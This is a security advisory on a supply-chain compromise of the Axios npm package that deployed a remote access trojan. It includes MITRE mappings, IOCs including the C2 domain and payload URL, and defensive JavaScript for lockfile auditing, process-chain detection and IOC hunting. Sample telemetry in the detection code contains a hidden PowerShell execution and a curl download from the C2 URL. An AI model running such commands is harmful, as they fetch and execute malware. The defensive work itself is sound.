Axios NPM Package Supply Chain Compromise Leads to RAT Deployment

A supply chain compromise delivered malicious versions of the Axios npm package carrying a hidden dependency whose postinstall script downloaded and deployed a remote access trojan on developer and CI/CD systems. LevelBlue detected abnormal command interpreters spawned by npm/node and outbound C2 traffic to sfrclak[.]com (142.11.206[.]73), and provided containment, remediation, and hunting guidance.

Keypoints

  • Malicious versions of the Axios npm package ([email protected] and [email protected]) were published after compromise of a developer’s npm account, introducing a hidden dependency that ran during installation.
  • The hidden dependency executed automatically via an npm postinstall script, which downloaded and executed a secondary payload that deployed a remote access trojan (RAT).
  • Multiple systems showed abnormal parent-child process chains where npm/node spawned cmd.exe and powershell.exe followed by network utilities (curl/wget), indicating automated post-install command execution.
  • LevelBlue’s Cybereason EDR generated detections for post-install script execution, renamed PowerShell spawning, and suspicious outbound network communications tied to C2 infrastructure.
  • Observed IOCs include SHA256 hashes for payloads, malicious filenames (package/setup.js, 6202033.ps1), a C2 domain (sfrclak[.]com), and a C2 IP (142.11.206[.]73) with a payload URL.
  • Recommended actions include isolating affected systems, reimaging hosts, rotating exposed credentials and npm credentials, disabling npm scripts where feasible, enforcing dependency pinning and integrity checks, and auditing CI/CD pipelines.
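
The last recommendation above (disable npm scripts where feasible, pin dependencies, enforce integrity checks) can be checked mechanically against a project's lockfile and package.json. The script below is an added example, not LevelBlue's or the Axios project's code. It relies on two real fields of the package-lock.json v2/v3 "packages" map, `integrity` (the sha512 npm ci verifies) and `hasInstallScript` (true when a package declares preinstall/install/postinstall), and treats any package outside a reviewed set as a possible hidden dependency. The lock content, versions, and the package name "evil-helper" are constructed stand-ins; the advisory does not name the hidden dependency.

```javascript
// Added example (not from the advisory or the Axios project): audit a lockfile and
// package.json for the install-script, integrity and pinning controls recommended above.
// The sample data below is constructed; "evil-helper" is a hypothetical package name.

// package-lock.json v2/v3 keeps a "packages" map keyed by install path. Two real fields
// matter here: "integrity" (sha512 of the tarball, checked by npm ci) and
// "hasInstallScript" (true when the package declares preinstall/install/postinstall).
function auditLockfile(lock, reviewedPackages) {
  const findings = [];
  for (const [installPath, meta] of Object.entries(lock.packages || {})) {
    if (installPath === "") continue; // the root project itself
    const name = installPath.replace(/^.*node_modules\//, "");
    if (meta.hasInstallScript) {
      findings.push({
        package: name,
        issue: "declares an install lifecycle script (runs on install unless ignore-scripts=true)",
      });
    }
    if (typeof meta.integrity !== "string" || !meta.integrity.startsWith("sha512-")) {
      findings.push({ package: name, issue: "no sha512 integrity field, tarball cannot be verified" });
    }
    if (!reviewedPackages.has(name)) {
      findings.push({ package: name, issue: "not in the reviewed dependency set (possible hidden dependency)" });
    }
  }
  return findings;
}

// Exact pins only: a ^ or ~ range lets a later, possibly malicious, release be resolved.
function findUnpinned(pkgJson) {
  const unpinned = [];
  for (const section of ["dependencies", "devDependencies", "optionalDependencies"]) {
    for (const [name, spec] of Object.entries(pkgJson[section] || {})) {
      if (!/^\d+\.\d+\.\d+$/.test(spec)) unpinned.push({ package: name, spec });
    }
  }
  return unpinned;
}

// Constructed inputs: versions and integrity values are placeholders, not real releases.
const SAMPLE_PACKAGE_JSON = {
  dependencies: { axios: "^1.0.0", "sample-lib": "2.0.0" },
};
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    "": { name: "sample-app" },
    "node_modules/axios": { version: "0.0.0", integrity: "sha512-PLACEHOLDER" },
    "node_modules/sample-lib": { version: "2.0.0", integrity: "sha512-PLACEHOLDER" },
    // hypothetical hidden dependency: install script, no integrity, never reviewed
    "node_modules/evil-helper": { version: "0.0.1", hasInstallScript: true },
  },
};
const REVIEWED = new Set(["axios", "sample-lib"]);

console.log(auditLockfile(SAMPLE_LOCK, REVIEWED));
console.log(findUnpinned(SAMPLE_PACKAGE_JSON));
```

In a CI pipeline this runs before `npm ci`, and the lifecycle-script finding is the one to act on first: setting `ignore-scripts=true` in the project's .npmrc (or passing `--ignore-scripts`) prevents a postinstall hook like the one described above from executing at all, after which packages that genuinely need a build step can be allowlisted and built explicitly.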

MITRE Techniques

  • [T1195] Supply Chain Compromise – Initial access achieved by publishing malicious versions of a trusted package to npm after compromising a developer account; ‘threat actors successfully published malicious versions of the package to the npm repository after compromising the npm account of the company’s lead developer.’
  • [T1105] Ingress Tool Transfer – Secondary payloads and tooling were downloaded from external infrastructure during postinstall execution; ‘This resulted in the downloading and execution of a secondary payload.’
  • [T1059.001] Command and Scripting Interpreter: Windows Command Shell – npm/node spawned cmd.exe to run commands initiated by the malicious install script; ‘npm or node spawned command interpreters such as cmd.exe, powershell.exe, followed by execution of network utilities like curl or wget.’
  • [T1059.003] Command and Scripting Interpreter: PowerShell – Malicious PowerShell scripts (6202033.ps1) were observed and spawned by npm/node during exploitation; ‘Command line contains “6202033.ps1” OR “6202033.vbs”’ and detections for renamed PowerShell spawning were recorded.
  • [T1055] Process Injection or In-memory Execution – The attack included possible in-memory execution of components to avoid disk artifacts; ‘Potential in-memory execution of malware components.’
  • [T1071] Application Layer Protocol – Outbound C2 communications and payload retrieval used HTTP(s) to attacker-controlled domains and endpoints; ‘Establishment of outbound connections to attacker-controlled domains’ and reference to ‘http[:]//sfrclak[.]com[:]8000/6202033.’
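
The parent-child chain the techniques above describe (npm/node spawning cmd.exe or powershell.exe, which then launches curl or wget) is a detection on its own, independent of any specific hash or domain. The code below is an added example, not LevelBlue's detection content or anything from the Cybereason EDR. It walks process ancestry over constructed process-creation events; the event shape (pid, ppid, image, cmdline) is an assumption to be mapped onto whatever telemetry an EDR or Sysmon export provides, and the hostnames and paths in the sample are constructed.

```javascript
// Added example (not from the advisory): flag network utilities whose process ancestry
// contains an interpreter launched, directly or indirectly, by node/npm.
// Event fields (pid, ppid, image, cmdline) are an assumed telemetry shape.

const PKG_MANAGERS = new Set(["node.exe", "node", "npm", "npm.cmd", "npx", "npx.cmd"]);
const INTERPRETERS = new Set(["cmd.exe", "powershell.exe", "pwsh.exe"]);
const NET_TOOLS = new Set(["curl.exe", "wget.exe", "curl", "wget"]);

// Last path component, lower-cased, for either Windows or POSIX paths.
function baseName(image) {
  return image.split(/[\\/]/).pop().toLowerCase();
}

// Ancestry of an event, root-first; stops at unknown parents or a cycle.
function ancestry(event, byPid) {
  const chain = [event];
  const seen = new Set([event.pid]);
  let cur = event;
  while (byPid.has(cur.ppid) && !seen.has(cur.ppid)) {
    cur = byPid.get(cur.ppid);
    seen.add(cur.pid);
    chain.unshift(cur);
  }
  return chain;
}

// One finding per curl/wget process whose ancestors contain
// node/npm ... -> cmd/powershell ... -> the network tool, in that order.
function findInstallScriptChains(events) {
  const byPid = new Map(events.map(e => [e.pid, e]));
  const findings = [];
  for (const e of events) {
    if (!NET_TOOLS.has(baseName(e.image))) continue;
    const names = ancestry(e, byPid).map(p => baseName(p.image));
    const pmIdx = names.findIndex(n => PKG_MANAGERS.has(n));
    if (pmIdx === -1) continue;
    const interpIdx = names.findIndex((n, i) => i > pmIdx && INTERPRETERS.has(n));
    if (interpIdx === -1) continue;
    findings.push({ pid: e.pid, chain: names.join(" -> "), cmdline: e.cmdline });
  }
  return findings;
}

// Constructed sample telemetry: one chain shaped like the advisory's, one benign curl.
const SAMPLE_EVENTS = [
  { pid: 100, ppid: 1, image: "C:\\Program Files\\nodejs\\node.exe", cmdline: "node npm-cli.js install" },
  { pid: 101, ppid: 100, image: "C:\\Windows\\System32\\cmd.exe", cmdline: "cmd.exe /d /s /c node setup.js" },
  { pid: 102, ppid: 101, image: "C:\\Program Files\\nodejs\\node.exe", cmdline: "node setup.js" },
  { pid: 103, ppid: 102, image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    cmdline: "powershell -w hidden -ep bypass -f 6202033.ps1" },
  { pid: 104, ppid: 103, image: "C:\\Windows\\System32\\curl.exe",
    cmdline: "curl http://sfrclak.com:8000/6202033 -o 6202033" },
  // benign: a developer runs curl from an interactive shell with no npm ancestor
  { pid: 200, ppid: 1, image: "C:\\Windows\\System32\\cmd.exe", cmdline: "cmd.exe" },
  { pid: 201, ppid: 200, image: "C:\\Windows\\System32\\curl.exe", cmdline: "curl https://registry.npmjs.org/" },
];

for (const f of findInstallScriptChains(SAMPLE_EVENTS)) console.log(JSON.stringify(f));
```

Because the advisory also records renamed PowerShell spawning, matching on the image file name alone is not enough in practice; where the telemetry carries the binary's original file name or hash (Sysmon's OriginalFileName, EDR file metadata), the interpreter check should use that field so a copied or renamed powershell.exe still lands in INTERPRETERS.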

Indicators of Compromise

  • [SHA256] Post-install and payload file hashes – e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09 (package/setup.js), 617b67a8e1210e4fc87c92d1d1da45a2f311c08d26e89b12307cf583c900d101 (6202033.ps1)
  • [IP] Command-and-control server – 142.11.206[.]73 (C2 IP address observed communicating with infected hosts)
  • [Domain] Command-and-control domain – sfrclak[.]com (C2 domain used for payload hosting and control)
  • [URL] C2 / payload URL – http[:]//sfrclak[.]com[:]8000/6202033 (URL used to deliver secondary payload)
  • [File name] Malicious files observed on disk – package/setup.js, 6202033.ps1 (files tied to postinstall execution and payload delivery)
  • [Package version] Compromised npm package versions – [email protected], [email protected] (malicious package versions published to npm)
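
The indicators above are defanged, so a hunt script has to refang them before matching, and each indicator type needs its own comparison (exact for hashes and IPs, suffix match for domains, prefix match for the URL, path-suffix match for file names). The script below is an added example rather than LevelBlue's hunting content: it carries the indicators listed on this page and runs them over constructed DNS, proxy and file records. The record field names, hostnames and the local file path are assumptions.

```javascript
// Added example (not from the advisory): refang the IOCs listed above and match them
// against constructed DNS, proxy and file records. Record shapes are an assumption.

const RAW_IOCS = {
  sha256: [
    "e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09", // package/setup.js
    "617b67a8e1210e4fc87c92d1d1da45a2f311c08d26e89b12307cf583c900d101", // 6202033.ps1
  ],
  ip: ["142.11.206[.]73"],
  domain: ["sfrclak[.]com"],
  url: ["http[:]//sfrclak[.]com[:]8000/6202033"],
  filename: ["package/setup.js", "6202033.ps1"],
};

// Undo the common defanging conventions ([.] [:] hxxp) and normalise case.
function refang(s) {
  return s.replace(/\[\.\]/g, ".").replace(/\[:\]/g, ":").replace(/hxxp/gi, "http").toLowerCase();
}

function buildMatchers(raw) {
  const m = {};
  for (const [type, list] of Object.entries(raw)) m[type] = new Set(list.map(refang));
  return m;
}

// Every string field of every record is compared with the matcher appropriate to each
// IOC type; a record with at least one reason becomes a hit.
function huntIocs(records, m) {
  const hits = [];
  for (const r of records) {
    const reasons = [];
    for (const [field, value] of Object.entries(r)) {
      if (typeof value !== "string") continue;
      const v = value.toLowerCase();
      if (m.sha256.has(v)) reasons.push(`${field}: known payload hash`);
      if (m.ip.has(v)) reasons.push(`${field}: C2 IP`);
      for (const d of m.domain) if (v === d || v.endsWith("." + d)) reasons.push(`${field}: C2 domain`);
      for (const u of m.url) if (v.startsWith(u)) reasons.push(`${field}: payload URL`);
      const asPosix = v.replace(/\\/g, "/");
      for (const f of m.filename) {
        if (asPosix === f || asPosix.endsWith("/" + f)) reasons.push(`${field}: malicious file name`);
      }
    }
    if (reasons.length) hits.push({ host: r.host, source: r.source, reasons });
  }
  return hits;
}

// Constructed records; hostnames and the temp path are invented for the example.
const SAMPLE_RECORDS = [
  { source: "dns", host: "build-agent-01", query: "sfrclak.com" },
  { source: "proxy", host: "dev-laptop-07", dest_ip: "142.11.206.73", url: "http://sfrclak.com:8000/6202033" },
  { source: "file", host: "dev-laptop-07", path: "C:\\Users\\dev\\AppData\\Local\\Temp\\6202033.ps1",
    sha256: "617b67a8e1210e4fc87c92d1d1da45a2f311c08d26e89b12307cf583c900d101" },
  { source: "dns", host: "build-agent-02", query: "registry.npmjs.org" }, // benign
];

const MATCHERS = buildMatchers(RAW_IOCS);
for (const h of huntIocs(SAMPLE_RECORDS, MATCHERS)) console.log(JSON.stringify(h));
```

The domain matcher deliberately accepts subdomains, since a C2 domain is often reused with new hostnames, while the URL matcher is a prefix match so that query strings appended to the payload URL still hit; a hit on the file-name indicator alone is weaker evidence than a hash or network hit and is best treated as a prompt to pull the file's hash rather than as confirmation.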
Read more: https://www.levelblue.com/blogs/spiderlabs-blog/axios-npm-package-supply-chain-compromise-leads-to-rat-deployment